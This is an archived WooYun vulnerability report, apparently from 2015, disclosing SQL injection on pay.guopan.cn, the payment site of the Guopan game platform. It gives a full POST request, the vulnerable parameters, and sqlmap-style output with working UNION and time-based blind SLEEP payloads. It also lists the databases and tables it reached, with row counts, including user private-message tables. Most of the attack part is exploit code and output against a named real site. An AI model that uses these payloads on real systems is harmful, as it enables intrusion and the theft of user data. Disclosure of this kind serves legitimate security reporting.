当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114150

漏洞标题:果盘游戏某重要站点SQL注射

相关厂商:果盘

漏洞作者: 路人甲

提交时间:2015-05-15 09:55

修复时间:2015-06-29 09:56

公开时间:2015-06-29 09:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

233

详细说明:

注入点比较多。
1,
POST /pay.php HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: pay.guopan.cn
Cookie: *****打码区*****
Hm_lvt_1b78342dd1d7ec636f3e4a9f2e35bacd=1431597451; Hm_lpvt_1b78342dd1d7ec636f3e4a9f2e35bacd=1431597451
Host: pay.guopan.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
game=1&get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0&platform=1
参数:game相关的都有!!!
2.
pay.guopan.cn/game_list.php?find=&more=hot&platform=1
参数find,more,platform
3.
pay.guopan.cn/game_list.php?platform=1&word=
参数platform,word

漏洞证明:

---
Parameter: operator_platform (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: game=1&get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0') UNION ALL SELECT CONCAT(0x716a786b71,0x70525a6b746d77746166,0x71766a7871)-- &platform=1
Parameter: game (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: game=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Tjmn) AND 'WlEy'='WlEy&get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0&platform=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: game=1' UNION ALL SELECT CONCAT(0x716a786b71,0x4c766d5a4878534d6b4c,0x71766a7871)-- &get_server_list=1&operator_platform=iOS%E5%AE%98%E6%96%B9%E5%B9%B3%E5%8F%B0&platform=1
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0.12
available databases [7]:
[*] GPBbs
[*] GPMessageLog
[*] GPZixunVistLog
[*] Guopan
[*] information_schema
[*] testGPBbs
[*] testGuopan
Database: Guopan
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| guopan_online_log            | 4719597 |
| guopan_count_danmu_hour      | 1983942 |
| guopan_zixun_visit           | 495907  |
| guopan_count_tab             | 179721  |
| guopan_fankui                | 150779  |
| android_xx_user_feedback     | 50051   |
| coc_chongzhi_ask             | 48635   |
| coc_chongzhi_qudao_count     | 37826   |
| zixun_collect                | 31609   |
| coc_chongzhi_ask_msg         | 24856   |
| android_gp_packagedata_list  | 19772   |
| ios_xx_user_feedback         | 17052   |
| guild_msg_hour               | 14522   |
| guopan_count_danmu_all       | 9434    |
| information                  | 9064    |
| guopan_user_black_list       | 7915    |
| reg_summary_date             | 7652    |
| coc_chongzhi_vip             | 6692    |
| coc_chongzhi_user_info       | 6520    |
| game_server_list             | 5266    |
| ios_gp_packagedata_list      | 4799    |
| guopan_sms_day               | 2473    |
| guopan_danmu_eventkey_day    | 2143    |
| xx_pay_game_detail           | 930     |
| coc_chongzhi_date_count      | 886     |
| gp_kw_black_list             | 357     |
| web_xx_user_feedback         | 278     |
| gp_nickname_kw_black_list    | 234     |
| xx_pay_game_list             | 83      |
| android_gp_picture_file_list | 37      |
| android_gp_app_file_list     | 34      |
| ios_gp_picture_file_list     | 26      |
| ios_gp_game_list             | 25      |
| guopan_fid_game_map          | 22      |
| ios_gp_app_file_list         | 22      |
| android_gp_game_list         | 21      |
| chat_channel_base            | 12      |
| t_edituser                   | 12      |
| chat_server                  | 8       |
| chat_channel_ex              | 6       |
| android_xx_update_table      | 4       |
| ios_xx_activity_list         | 2       |
| android_xx_activity_list     | 1       |
+------------------------------+---------+
Database: GPBbs
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| sixin_msg_1504         | 861114  |
| sixin_msg_1503         | 631812  |
| sixin_msg_1501         | 560236  |
| guild_heat_log         | 479469  |
| dm_login_time_ac       | 476196  |
| sixin_sess_ab          | 453103  |
| sixin_msg_1502         | 396984  |
| sixin_msg_1412         | 369560  |
| sixin_msg_1505         | 356982  |
| sixin_sess_ac          | 311708  |
| comment_ab             | 180375  |
| guild_apply_log        | 154117  |
| dm_login_time_ab       | 141822  |
| f_uin_ab               | 111524  |
| dm_login_time_ad       | 86624   |
| u_c_ab                 | 80520   |
| sixin_msg_1411         | 65090   |
| u_c_ac                 | 63816   |
| dm_badreport           | 60617   |
| t_dianzan_uin_ab       | 58615   |
| sixin_sess_aa          | 54928   |
| fb_ab                  | 50759   |
| u_c_t_ab               | 47999   |
| dm_login_time_aa       | 47506   |
| sixin_u_del_sys_msg_ac | 44537   |
| tinfo_ab               | 38031   |
| u_c_aa                 | 36797   |
| u_c_t_ac               | 36310   |
| guild_member           | 27382   |
| sixin_sess_ad          | 26994   |
| f_uin_aa               | 25344   |
| u_t_ac                 | 25037   |
| sixin_u_del_sys_msg_ab | 22879   |
| u_c_t_aa               | 21276   |
| xfc_fankui             | 20667   |
| upload_video_log       | 17350   |
| gp_bbs_forum_day       | 17166   |
| uex_bbs_statistic_ac   | 17079   |
| u_t_ab                 | 16945   |
| fb_aa                  | 16247   |
| tinfo_aa               | 13033   |
| uex_bbs_statistic_ab   | 9024    |
| guild_info             | 9015    |
| u_deviceToken_ac       | 8055    |
| guild_type             | 7954    |
| admin_log              | 7446    |
| quit_guild_log         | 7407    |
| u_t_aa                 | 7401    |
| sixin_u_del_sys_msg_aa | 7308    |
| sixin_msg_1409         | 6792    |
| dm_badreport_private   | 5678    |
| guild_active_log       | 5432    |
| vote_info              | 4474    |
| u_deviceToken_ab       | 3500    |
| t_badreport_log        | 3347    |
| sixin_u_del_sys_msg_ad | 3206    |
| t_manager_del_log      | 3079    |
| at_dianzan_uin_aa      | 3026    |
| uex_bbs_statistic_aa   | 2859    |
| at_comment_aa          | 2783    |
| comment_aa             | 2755    |
| a_uin                  | 2302    |
| tinfo_log              | 2056    |
| u_c_ad                 | 1955    |
| u_deviceToken_aa       | 1856    |
| u_t_ad                 | 1724    |
| uex_bbs_statistic_ad   | 1692    |
| u_c_t_ad               | 1270    |
| user_upload            | 1264    |
| atinfo                 | 899     |
| vote_statistics        | 854     |
| sixin_msg_1408         | 822     |
| t_dianzan_uin_aa       | 779     |
| sixin_msg_1410         | 650     |
| gp_bbs_activity_day    | 576     |
| u_deviceToken_ad       | 377     |
| xfc_game_info          | 211     |
| t_recomend_list        | 195     |
| kw_block_list          | 175     |
| user_block_list        | 173     |
| gp_bbs_basic_day       | 155     |
| guild_base_day         | 142     |
| t_recomend_video_list  | 122     |
| t_copy_to_f_log        | 117     |
| finfo                  | 69      |
| ainfo                  | 39      |
| sixin_block_list       | 36      |
| at_badreport_log       | 32      |
| f_game_list            | 30      |
| f_gpapp                | 27      |
| radio_history          | 16      |
| f_recommend_list       | 12      |
| sixin_msg_sys          | 12      |
| a_recommend_list       | 8       |
| f_banner_list          | 8       |
| f_interest_list        | 5       |
| t_web_recomend_list    | 3       |
| ftype_info             | 2       |
+------------------------+---------+

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝